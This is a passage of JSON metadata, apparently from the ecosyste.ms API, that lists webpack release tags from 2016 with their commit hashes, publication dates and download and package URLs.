pack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11